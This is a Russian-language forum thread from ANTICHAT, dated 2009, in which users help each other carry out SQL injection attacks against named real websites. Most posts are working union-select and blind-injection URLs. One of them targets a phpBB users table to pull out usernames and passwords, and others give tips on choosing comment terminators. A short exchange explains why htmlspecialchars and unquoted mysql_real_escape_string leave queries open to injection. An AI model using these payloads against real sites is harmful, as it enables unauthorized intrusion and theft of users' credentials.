HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.01.2009, 22:19
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

Цитата:
americanbible.org/absport/news/item.php?id=181'

При подборе вообще не реагирует. в чем дело?
http://www.americanbible.org/absport/news/item.php?id=181'/**/and/**/if(4=substring(version(),1,1),(select/**/1/**/from/**/ABS_shortcutURLs),1)/*
 
Ответить с цитированием

  #2  
Старый 01.02.2009, 00:31
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+cpg_users--

Блин почему не выводит ничего? =\
Таблица такая сам смотрел и колонка тоже такая
 
Ответить с цитированием

  #3  
Старый 01.02.2009, 00:43
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Цитата:
Сообщение от diznt  
teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+cpg_users--

Блин почему не выводит ничего? =\
Таблица такая сам смотрел и колонка тоже такая
Да таблица существует в этой базе данных, но она пустая. Оттуда нечего брать.
 
Ответить с цитированием

  #4  
Старый 01.02.2009, 00:48
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Для cpg_users table_schema=KOLESHEV_1

но

http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+KOLESHEV_1.cpg_users+--+

command denied to user ..

зато можешь посмотреть юзеров форума

http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,concat_ws(0x2F,username,user_ password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+ from+phpbb_users+limit+1,1+--+
 
Ответить с цитированием

  #5  
Старый 01.02.2009, 00:34
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

diznt, проверь table_schema. То есть таблица может находится в другой ДБ, то есть имя таблицы будет писаться так. [table_schema].[имя таблица]

Последний раз редактировалось Tigger; 01.02.2009 в 00:58..
 
Ответить с цитированием

  #6  
Старый 01.02.2009, 00:47
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040

Репутация: 15
По умолчанию

Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
 
Ответить с цитированием

  #7  
Старый 01.02.2009, 02:09
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
По умолчанию

Цитата:
Сообщение от Qam  
Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
если имеется в виду XSS, то нет. Но если $style_text впоследствии попадает в SQL-запрос, то фильтрация с помощью htmlspecialchars() не спасет от SQL-инъекций. Используй mysql_(real_)*escape_string()
 
Ответить с цитированием

  #8  
Старый 01.02.2009, 04:56
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию

Цитата:
Сообщение от [Raz0r]  
Используй mysql_(real_)*escape_string()
тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без кавычек то
Цитата:
mysql_real_escape_string() вызывает библиотечную функцмю MySQL mysql_real_escape_string, которая добавляет обратную косую черту к следующим символам: \x00, \n, \r, \, ', " and \x1a.
то есть например

$sql="SELECT `password` FROM user where id =".mysql_real_escape_string($_GET['user'])."LIMIT 1";
все равно уязвим.

Последний раз редактировалось AkyHa_MaTaTa; 01.02.2009 в 19:53..
 
Ответить с цитированием

  #9  
Старый 01.02.2009, 00:50
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
 
Ответить с цитированием

  #10  
Старый 01.02.2009, 01:00
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

Цитата:
Сообщение от diznt  
ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
Не думай об этом)) Делай так. Составил запрос. Ошибка? Пробуешь --. не пашет? Пробуешь /*. Не пашет? Пробуешь +--+. Снова не пашет? Ну на кройняк ++-- =))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.